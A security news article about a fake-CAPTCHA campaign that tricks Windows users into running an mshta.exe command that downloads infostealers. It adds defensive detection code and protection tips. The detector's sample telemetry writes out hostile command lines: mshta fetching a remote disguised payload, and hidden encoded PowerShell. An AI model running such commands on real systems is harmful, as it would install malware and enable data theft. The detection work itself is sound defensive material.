That weird CAPTCHA could be a malware trap – here’s how to protect yourself

A persistent malware campaign is exploiting the ubiquitous CAPTCHA process to try to steal data from unsuspecting victims.
As described by security firm Malwarebytes in a new report, this scheme relies on the ease with which people often follow the steps in a CAPTCHA prompt without thinking.
How the attack works
You land on a website that promises movies, music, pictures, news articles, or some other interesting content. A CAPTCHA prompt pops up, asking you to prove that you’re not a robot. As we’re all so used to these types of requests, many of us wouldn’t think twice about accepting it.
But instead of the usual CAPTCHA challenge that asks you to choose certain images in a picture or identify distorted characters, this one serves up the instructions seen in the image below:
At this point, most savvy users would realize that something is off here and exit the site. But remember that cybercriminals aren’t targeting savvy users; they’re trying to hit people who are less knowledgeable and more easily tricked. Even sophisticated users in a rush or on autopilot could fall prey to the trap.
If you follow the steps, the website copies a text string to your Windows clipboard. Normally, you’d have to grant your permission for such an action, but you already did so by checking a checkbox on the first screen of the CAPTCHA prompt.
As seen in the Windows Run text field, the string says simply: “I’m not a robot — reCAPTCHA Verification ID: 8253.” But behind the scenes is another string, one that runs a Windows command called Mshta.exe. Normally, mshta.exe is a legitimate, signed Windows utility that executes HTML Applications (HTA files), but because it will happily fetch and run code from a remote address, hackers and scammers can easily abuse it to download and install malware. And that’s exactly what happens here.
In this case, Mshta grabs a malicious media file from the website. The name of the file may look innocent enough. Malwarebytes said that it’s seen files with such extensions as mp3, mp4, jpg, jpeg, swf, and html. But the file itself contains an encoded PowerShell command that invisibly downloads and runs the actual destructive payload.
In the past, the downloaded malware was almost always the Lumma Stealer infostealer. But with more recent campaigns, the attackers have used SecTopRAT instead. Either way, the malware is designed to infect your PC to steal sensitive data.
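The process chain described above (a user-pasted Run command that launches mshta.exe against a remote “media” file, which then spawns encoded PowerShell) is exactly what a defender can hunt for in endpoint telemetry. The Python below is an added example for this article, not code from Malwarebytes’ report; it assumes Sysmon-style process-creation events with Image, ParentImage and CommandLine fields, and the sample events are constructed.

```python
import re
from urllib.parse import urlparse

# Extensions the report says were used to disguise the HTA payload
DISGUISE_EXTS = {"mp3", "mp4", "jpg", "jpeg", "swf", "html"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# PowerShell's -EncodedCommand switch and its accepted abbreviations
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b", re.IGNORECASE)


def exe_name(path):
    """Lower-case file name of a Windows path, e.g. 'mshta.exe'."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify_event(ev):
    """Return a list of finding strings for one process-creation event."""
    image, parent = exe_name(ev["Image"]), exe_name(ev["ParentImage"])
    cmd = ev["CommandLine"]
    findings = []
    if image == "mshta.exe":
        m = URL_RE.search(cmd)
        if m:  # mshta pulling an HTA from a remote host, not a local file
            findings.append("mshta.exe fetching remote content")
            ext = urlparse(m.group(0).strip('"')).path.rsplit(".", 1)[-1].lower()
            if ext in DISGUISE_EXTS:
                findings.append(f"remote payload disguised as .{ext}")
            if parent == "explorer.exe":  # Run dialog launches land under Explorer
                findings.append("launched via Run dialog / Explorer (user-pasted)")
    if image in ("powershell.exe", "pwsh.exe") and ENC_RE.search(cmd):
        if parent == "mshta.exe":  # second stage: encoded PowerShell from the HTA
            findings.append("encoded PowerShell spawned by mshta.exe")
    return findings


def scan(events):
    """Flatten findings over a batch of events as (ProcessId, finding) pairs."""
    return [(ev["ProcessId"], f) for ev in events for f in classify_event(ev)]


SAMPLE_EVENTS = [  # constructed sample telemetry, not real captures
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://example.invalid/media/clip.mp4'},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -enc QUFBQQ=="},
    {"ProcessId": 5000, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\App\setup.exe",
     "CommandLine": r"mshta.exe C:\Program Files\App\install.hta"},  # benign local HTA
]

if __name__ == "__main__":
    for pid, finding in scan(SAMPLE_EVENTS):
        print(pid, finding)
```

The third sample (a local HTA run by an installer) produces no findings, which is the point of keying on the remote URL and the Explorer parent rather than on mshta.exe alone.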
How to protect yourself
Aside from knowing the tactics, how can you protect yourself from this campaign and similar ones? Malwarebytes offers a few tips:
- Never follow instructions given on a website without thinking it through first.
- Use a security program and browser extension that block malicious websites and scripts.
- Disable JavaScript in your browser if you’re visiting random or unknown websites. In the campaign described by Malwarebytes, access to the clipboard is granted via a JavaScript function. Disabling JavaScript will thwart the attack; however, it may prevent you from using many regular sites that you visit. You may want to block it in general but allow it for specific sites.
Disabling JavaScript
To disable JavaScript in Google Chrome, go to Settings, select Privacy and security, and then click Site settings. Click the setting for JavaScript and change the option to “Disable JavaScript for all sites.” You can then add specific sites that are allowed to use JavaScript.
To disable JavaScript in Edge, go to Settings, select Cookies and Site Permissions, and then click JavaScript. Turn off the switch for Allowed, and then add any individual sites for which you want JavaScript to work.
To disable JavaScript in Firefox, you’ll have to install a third-party add-on or use the configuration editor. For that, type about:config in the address field and accept the risk to continue. Type javascript.enabled in the search field and select the result. Double-click it to change the value from true to false.